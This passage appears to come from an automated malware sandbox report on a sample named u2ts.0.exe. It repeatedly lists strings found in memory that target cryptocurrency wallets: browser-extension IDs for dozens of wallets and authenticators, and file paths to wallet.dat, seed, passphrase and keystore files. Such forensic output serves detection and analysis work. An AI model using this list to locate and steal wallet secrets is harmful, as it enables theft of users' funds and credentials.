Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx 